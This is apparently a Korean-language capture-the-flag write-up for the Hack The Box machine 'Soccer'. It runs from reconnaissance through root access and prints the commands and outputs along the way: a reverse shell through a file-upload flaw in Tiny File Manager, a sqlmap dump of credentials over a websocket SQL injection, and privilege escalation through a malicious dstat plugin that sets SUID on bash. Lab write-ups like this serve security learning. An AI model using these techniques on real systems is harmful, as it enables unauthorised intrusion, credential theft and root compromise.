Proof of Concept
10.129.9.50
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9091/tcp open xmltec-xmlmailInitial Access
80포트 웹서비스 접속 시 http://soccer.htb로 리다이렉트 됨
┌──(kali㉿kali)-[~/Soccer]
└─$ sudo nmap 10.129.9.50 --open --min-rate 3000 -oN scan -sCV -p80
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-16 11:19 -0500
Nmap scan report for 10.129.9.50
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.89 seconds/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/Soccer]
└─$ cat /etc/hosts
<SNIP>
10.129.9.50 soccer.htb하위 디렉토리 탐색 결과 http://soccer.htb/tiny/ 발견
┌──(kali㉿kali)-[~/Soccer]
└─$ feroxbuster -u http://soccer.htb -t 100 -s 200
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://soccer.htb/
🚩 In-Scope Url │ soccer.htb
🚀 Threads │ 100
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 494l 1440w 96128c http://soccer.htb/ground3.jpg
200 GET 2232l 4070w 223875c http://soccer.htb/ground4.jpg
200 GET 711l 4253w 403502c http://soccer.htb/ground2.jpg
200 GET 809l 5093w 490253c http://soccer.htb/ground1.jpg
200 GET 147l 526w 6917c http://soccer.htb/
[####################] - 87s 90021/90021 0s found:5 errors:0
[####################] - 60s 30000/30000 504/s http://soccer.htb/
[####################] - 62s 30000/30000 482/s http://soccer.htb/tiny/
[####################] - 62s 30000/30000 488/s http://soccer.htb/tiny/uploads/ http://soccer.htb/tiny/에 접속하면 “Tiny File Manager” 서비스 로그인 페이지가 뜨며, 기본 관리자 계정 “admin/admin@123”으로 로그인 가능
로그인 이후 Tiny File Manager 2.4.3 버전 사용중인 것을 발견
Tiny File Manager 2.4.3 에서 File Upload 취약점 발견 (CVE-2021-45010)
http://soccer.htb/tiny/tinyfilemanager.php?p=tiny%2Fuploads에 리버스쉘 연결을 시도하는 reverseshell.php 파일 업로드 후,
이후 NC 리버스쉘 실행하고 http://soccer.htb/tiny/uploads/reverseshell.php에 접속하면 리버스쉘이 연결됨
┌──(kali㉿kali)-[~/Soccer/CVE-2021-45010-TinyFileManager-Exploit]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.9.50] 53990
Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
13:40:20 up 26 min, 0 users, load average: 0.08, 0.05, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$Auth as player
타겟 머신의 /etc/hosts 파일에서 다른 서브 도메인 발견
- soc-player.soccer.htb
www-data@soccer:/$ cat /etc/hosts
cat /etc/hosts
127.0.0.1 localhost soccer soccer.htb soc-player.soccer.htb
127.0.1.1 ubuntu-focal ubuntu-focal공격자 컴퓨터의 /etc/hosts 파일에 서브 도메인 추가
┌──(kali㉿kali)-[~/Soccer]
└─$ cat /etc/hosts
<SNIP>
10.129.9.50 soccer.htb soc-player.soccer.htbhttp://soc-player.soccer.htb 페이지에서 회원가입 후 로그인하면 ticket 번호를 확인하는 /check 페이지로 접속되며, 해당 페이지에서 SQL Injection 취약점 발견
1 or '1'='1'-- sqlmap을 사용하여 DB 추출 결과 soccer_db 데이터베이스 발견
┌──(kali㉿kali)-[~/Soccer]
└─$ sqlmap -u "ws://soc-player.soccer.htb:9091" --data='{"id":"1"}' --level=5 --risk=3 --dbs --technique=B --batch -t 10
___
__H__
___ ___[.]_____ ___ ___ {1.9.12#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:00:58 /2026-02-16/
[13:00:58] [INFO] setting file for logging HTTP traffic
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
[13:00:58] [INFO] testing connection to the target URL
[13:01:02] [INFO] testing if the target URL content is stable
[13:01:02] [INFO] target URL content is stable
[13:01:02] [INFO] testing if (custom) POST parameter 'JSON id' is dynamic
[13:01:03] [WARNING] (custom) POST parameter 'JSON id' does not appear to be dynamic
[13:01:04] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON id' might not be injectable
[13:01:05] [INFO] testing for SQL injection on (custom) POST parameter 'JSON id'
[13:01:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:01:47] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[13:02:02] [INFO] (custom) POST parameter 'JSON id' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable
[13:02:17] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[13:02:17] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[13:02:17] [INFO] checking if the injection point on (custom) POST parameter 'JSON id' is a false positive
(custom) POST parameter 'JSON id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 117 HTTP(s) requests:
---
Parameter: JSON id ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: {"id":"-7285 OR 5686=5686"}
---
[13:02:35] [INFO] testing MySQL
[13:02:36] [INFO] confirming MySQL
[13:02:38] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 8.0.0
[13:02:43] [INFO] fetching database names
[13:02:43] [INFO] fetching number of databases
[13:02:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:02:43] [INFO] retrieved: 5
[13:02:48] [INFO] retrieved: mysql
[13:03:13] [INFO] retrieved: information_schema
[13:04:46] [INFO] retrieved: performance_schema
[13:06:12] [INFO] retrieved: sys
[13:06:28] [INFO] retrieved: soccer_db
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys
[13:07:14] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb'
[*] ending @ 13:07:14 /2026-02-16/soccer_db 내 테이블 열거 결과 accounts 테이블 발견
┌──(kali㉿kali)-[~/Soccer]
└─$ sqlmap -u "ws://soc-player.soccer.htb:9091" --data='{"id":"1"}' --level=5 --risk=3 --dbs --technique=B --batch -t 10 -v 0 -D soccer_db --tables
___
__H__
___ ___[']_____ ___ ___ {1.9.12#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:12:54 /2026-02-16/
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON id ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: {"id":"-7285 OR 5686=5686"}
---
back-end DBMS: MySQL 8
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys
Database: soccer_db
[1 table]
+----------+
| accounts |
+----------+
[*] ending @ 13:13:42 /2026-02-16/accounts 테이블 덤프 결과 player 계정 정보 획득
- player:PlayerOftheMatch2022
└─$ sqlmap -u "ws://soc-player.soccer.htb:9091" --data='{"id":"1"}' --level=5 --risk=3 --dbs --technique=B --batch -t 10 -v 0 -D soccer_db -T accounts --dump
___
__H__
___ ___[']_____ ___ ___ {1.9.12#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:14:06 /2026-02-16/
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON id ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: {"id":"-7285 OR 5686=5686"}
---
back-end DBMS: MySQL 8
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id | email | password | username |
+------+-------------------+----------------------+----------+
| 1324 | player@player.htb | PlayerOftheMatch2022 | player |
+------+-------------------+----------------------+----------+획득한 player 계정 정보로 SSH 접속 성공
┌──(kali㉿kali)-[~/Soccer]
└─$ sshpass -p 'PlayerOftheMatch2022' ssh player@soccer.htb
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Feb 16 15:34:57 UTC 2026
System load: 0.08
Usage of /: 70.7% of 3.84GB
Memory usage: 22%
Swap usage: 0%
Processes: 233
Users logged in: 0
IPv4 address for eth0: 10.129.9.50
IPv6 address for eth0: dead:beef::250:56ff:feb0:a195
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Dec 13 07:29:10 2022 from 10.10.14.19
player@soccer:~$Read user.txt
player@soccer:~$ cat user.txt
2d984bca4f531de3759e58970c188268
player@soccer:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:a1:95 brd ff:ff:ff:ff:ff:ff
inet 10.129.9.50/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 3059sec preferred_lft 3059sec
inet6 dead:beef::250:56ff:feb0:a195/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:feb0:a195/64 scope link
valid_lft forever preferred_lft foreverPrivilege Escalation
/usr/local/bin/doas 바이너리에 SetUID가 설정된 것을 확인
player@soccer:~$ find / -perm -4000 -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 42224 Nov 17 2022 /usr/local/bin/doas
-rwsr-xr-x 1 root root 142792 Nov 28 2022 /usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root messagebus 51344 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 473576 Mar 30 2022 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 22840 Feb 21 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 14488 Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 39144 Feb 7 2022 /usr/bin/umount
-rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 55528 Feb 7 2022 /usr/bin/mount
-rwsr-xr-x 1 root root 67816 Feb 7 2022 /usr/bin/su
-rwsr-xr-x 1 root root 44784 Nov 29 2022 /usr/bin/newgrp
-rwsr-xr-x 1 root root 85064 Nov 29 2022 /usr/bin/chfn
-rwsr-xr-x 1 root root 166056 Jan 19 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 68208 Nov 29 2022 /usr/bin/passwd
-rwsr-xr-x 1 root root 88464 Nov 29 2022 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 53040 Nov 29 2022 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 55560 Nov 12 2018 /usr/bin/at
-rwsr-xr-x 1 root root 123560 Nov 25 2022 /snap/snapd/17883/usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 85064 Mar 14 2022 /snap/core20/1695/usr/bin/chfn
-rwsr-xr-x 1 root root 53040 Mar 14 2022 /snap/core20/1695/usr/bin/chsh
-rwsr-xr-x 1 root root 88464 Mar 14 2022 /snap/core20/1695/usr/bin/gpasswd
-rwsr-xr-x 1 root root 55528 Feb 7 2022 /snap/core20/1695/usr/bin/mount
-rwsr-xr-x 1 root root 44784 Mar 14 2022 /snap/core20/1695/usr/bin/newgrp
-rwsr-xr-x 1 root root 68208 Mar 14 2022 /snap/core20/1695/usr/bin/passwd
-rwsr-xr-x 1 root root 67816 Feb 7 2022 /snap/core20/1695/usr/bin/su
-rwsr-xr-x 1 root root 166056 Jan 19 2021 /snap/core20/1695/usr/bin/sudo
-rwsr-xr-x 1 root root 39144 Feb 7 2022 /snap/core20/1695/usr/bin/umount
-rwsr-xr-- 1 root systemd-resolve 51344 Oct 25 2022 /snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 473576 Mar 30 2022 /snap/core20/1695/usr/lib/openssh/ssh-keysigndoas 설정 파일 확인 결과 /usr/bin/dstat 사용 가능
player@soccer:~$ find / -name "*doas.conf*" -exec ls -l {} \; 2>/dev/null
-rw-r--r-- 1 root root 7446 Nov 17 2022 /usr/local/share/man/man5/doas.conf.5
-rw-r--r-- 1 root root 48 Nov 17 2022 /usr/local/etc/doas.conf
player@soccer:~$ cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstatFound locate the “dstat” directory and created a plugin called “dstat_exploit.py” under “/usr/local/share/dstat/“.
player@soccer:~$ find / -type d -name dstat 2>/dev/null
/usr/share/doc/dstat
/usr/share/dstat
/usr/local/share/dstat
player@soccer:~$ cd /usr/local/share/dstat
player@soccer:/usr/local/share/dstat$ vi dstat_exploit.py
player@soccer:/usr/local/share/dstat$ cat dstat_exploit.py
import os
os.system('chmod +s /usr/bin/bash')Now execute “dstat” with —exploit” flag and obtained root shell
player@soccer:/usr/local/share/dstat$ doas /usr/bin/dstat --exploit
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
import imp
Module dstat_exploit failed to load. (name 'dstat_plugin' is not defined)
None of the stats you selected are available.
player@soccer:/usr/local/share/dstat$ bash -p
bash-5.0# whoami
root
Read root.txt
bash-5.0# cat root.txt
33f6ecde3bc2d3af79bc5023e8333150
bash-5.0# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:a1:95 brd ff:ff:ff:ff:ff:ff
inet 10.129.9.50/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2106sec preferred_lft 2106sec
inet6 dead:beef::250:56ff:feb0:a195/64 scope global dynamic mngtmpaddr
valid_lft 86396sec preferred_lft 14396sec
inet6 fe80::250:56ff:feb0:a195/64 scope link
valid_lft forever preferred_lft forever